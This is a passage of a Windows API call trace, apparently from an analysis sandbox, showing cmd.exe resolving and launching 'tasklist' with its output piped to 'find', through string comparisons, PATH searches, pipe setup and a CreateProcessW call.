lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0083.286] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0083.286] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0083.286] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0083.286] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0083.287] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0083.287] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0083.287] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0083.287] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0083.287] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0083.287] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0083.287] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0083.288] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0083.288] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0083.288] _wcsicmp (_String1="IF", _String2="find") returned 3 [0083.288] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0083.288] _wcsicmp (_String1="REM", _String2="find") returned 12 [0083.288] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0083.288] _pipe (in: _PtHandles=0xa351f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xa351f0) returned 0 [0083.289] _dup (_FileHandle=1) returned 5 [0083.289] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0083.289] _close (_FileHandle=4) returned 0 [0083.289] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0083.289] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0083.289] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0083.289] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0083.289] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0083.289] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0083.289] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0083.289] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0083.289] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0083.289] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0083.289] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0083.289] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0083.289] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0083.289] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0083.289] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0083.289] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0083.289] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0083.289] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0083.289] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0083.289] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0083.289] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0083.289] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0083.289] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0083.289] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0083.290] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0083.290] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0083.290] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0083.290] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0083.290] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0083.290] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0083.290] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0083.290] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0083.290] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0083.290] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0083.290] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0083.290] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0083.290] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0083.290] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0083.290] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0083.290] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0083.290] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0083.290] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0083.290] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0083.290] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0083.290] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0083.290] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0083.290] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0083.290] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0083.290] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0083.290] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0083.290] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0083.290] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0083.290] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0083.290] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0083.290] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0083.290] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0083.290] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0083.290] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0083.290] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0083.290] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0083.290] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0083.290] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0083.290] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0083.290] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0083.290] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0083.290] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0083.290] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0083.290] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0083.290] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0083.290] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0083.291] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0083.291] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0083.291] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0083.291] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0083.291] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0083.291] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0083.291] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0083.291] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0083.291] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0083.291] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0083.291] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0083.291] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0083.291] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0083.291] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0083.291] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0083.291] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0083.291] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0083.291] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0083.291] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0083.291] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0083.291] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0083.291] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0083.291] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0083.291] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0083.291] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0083.291] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0083.291] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0083.291] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0083.291] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0083.291] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0083.291] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0083.291] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0083.291] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0083.291] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0083.291] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0083.291] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0083.291] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0083.292] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0083.292] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0083.292] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0083.292] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0083.292] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0083.292] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0083.292] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0083.292] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0083.292] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0083.292] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0083.292] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0083.292] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0083.292] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0083.292] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0083.292] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0083.292] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0083.292] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0083.292] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0083.292] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0083.292] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0083.292] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0083.292] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0083.292] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0083.292] SetErrorMode (uMode=0x0) returned 0x0 [0083.292] SetErrorMode (uMode=0x1) returned 0x0 [0083.292] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xa35228, lpFilePart=0x71f564 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x71f564*="Desktop") returned 0x1c [0083.292] SetErrorMode (uMode=0x0) returned 0x1 [0083.293] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0083.293] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0083.296] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.297] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.297] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x71f2f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f2f0) returned 0xffffffff [0083.297] GetLastError () returned 0x2 [0083.297] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.297] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x71f2f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f2f0) returned 0xa35530 [0083.297] FindClose (in: hFindFile=0xa35530 | out: hFindFile=0xa35530) returned 1 [0083.297] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x71f2f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f2f0) returned 0xffffffff [0083.297] GetLastError () returned 0x2 [0083.297] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x71f2f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f2f0) returned 0xa35530 [0083.298] FindClose (in: hFindFile=0xa35530 | out: hFindFile=0xa35530) returned 1 [0083.298] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0083.298] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0083.298] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0083.298] SetErrorMode (uMode=0x0) returned 0x0 [0083.298] SetErrorMode (uMode=0x1) returned 0x0 [0083.298] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xa3a3c0, lpFilePart=0x71f30c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x71f30c*="Desktop") returned 0x1c [0083.298] SetErrorMode (uMode=0x0) returned 0x1 [0083.298] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0083.298] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0083.298] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.298] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.298] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x71f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f098) returned 0xffffffff [0083.298] GetLastError () returned 0x2 [0083.298] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.299] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x71f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f098) returned 0xa35628 [0083.299] FindClose (in: hFindFile=0xa35628 | out: hFindFile=0xa35628) returned 1 [0083.299] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x71f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f098) returned 0xffffffff [0083.299] GetLastError () returned 0x2 [0083.299] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x71f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f098) returned 0xa35628 [0083.299] FindClose (in: hFindFile=0xa35628 | out: hFindFile=0xa35628) returned 1 [0083.299] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0083.299] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0083.299] GetConsoleTitleW (in: lpConsoleTitle=0x71f594, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0083.299] InitializeProcThreadAttributeList (in: lpAttributeList=0x71f4c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x71f4a4 | out: lpAttributeList=0x71f4c0, lpSize=0x71f4a4) returned 1 [0083.299] UpdateProcThreadAttribute (in: lpAttributeList=0x71f4c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x71f4ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x71f4c0, lpPreviousValue=0x0) returned 1 [0083.299] GetStartupInfoW (in: lpStartupInfo=0x71f4f8 | out: lpStartupInfo=0x71f4f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x158, hStdError=0x2c)) [0083.299] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0083.299] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0083.299] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0083.299] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0083.299] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0083.299] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.299] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0083.300] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0083.300] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0083.301] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x71f448*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x71f494 | out: lpCommandLine="tasklist", lpProcessInformation=0x71f494*(hProcess=0x64, hThread=0x60, dwProcessId=0x8dc, dwThreadId=0x974)) returned 1 [0083.304] CloseHandle (hObject=0x60) returned 1 [0083.304] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0083.305] GetEnvironmentStringsW () returned 0xa342d8* [0083.305] FreeEnvironmentStringsA (penv="=") returned 1 [0083.305] DeleteProcThreadAttributeList (in: lpAttributeList=0x71f4c0 | out: lpAttributeList=0x71f4c0) [0083.305] _get_osfhandle (_FileHandle=3) returned 0x54 [0083.305] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0083.305] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0083.305] _close (_FileHandle=5) returned 0 [0083.305] _dup (_FileHandle=0) returned 4 [0083.305] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0083.305] _close (_FileHandle=3) returned 0 [0083.305] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0083.305] SetErrorMode (uMode=0x0) returned 0x0 [0083.305] SetErrorMode (uMode=0x1) returned 0x0 [0083.305] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xa342e0, lpFilePart=0x71f564 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x71f564*="Desktop") returned 0x1c [0083.305] SetErrorMode (uMode=0x0) returned 0x1 [0083.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0083.305] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0083.305] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.305] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.306] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x71f2f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f2f0) returned 0xffffffff [0083.306] GetLastError () returned 0x2 [0083.306] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x71f2f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f2f0) returned 0xa35628 [0083.306] FindClose (in: hFindFile=0xa35628 | out: hFindFile=0xa35628) returned 1 [0083.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x71f2f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f2f0) returned 0xffffffff [0083.306] GetLastError () returned 0x2 [0083.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x71f2f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f2f0) returned 0xa35628 [0083.306] FindClose (in: hFindFile=0xa35628 | out: hFindFile=0xa35628) returned 1 [0083.306] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0083.306] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0083.306] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0083.306] SetErrorMode (uMode=0x0) returned 0x0 [0083.306] SetErrorMode (uMode=0x1) returned 0x0 [0083.307] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xa34668, lpFilePart=0x71f30c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x71f30c*="Desktop") returned 0x1c [0083.307] SetErrorMode (uMode=0x0) returned 0x1 [0083.307] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0083.307] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0083.307] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.307] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.307] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x71f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f098) returned 0xffffffff [0083.307] GetLastError () returned 0x2 [0083.307] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x71f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f098) returned 0xa304a0 [0083.307] FindClose (in: hFindFile=0xa304a0 | out: hFindFile=0xa304a0) returned 1 [0083.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x71f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f098) returned 0xffffffff [0083.308] GetLastError () returned 0x2 [0083.308] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x71f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71f098) returned 0xa304a0 [0083.308] FindClose (in: hFindFile=0xa304a0 | out: hFindFile=0xa304a0) returned 1 [0083.308] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0083.308] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0083.308] GetConsoleTitleW (in: lpConsoleTitle=0x71f594, nSize=0x104 | out: 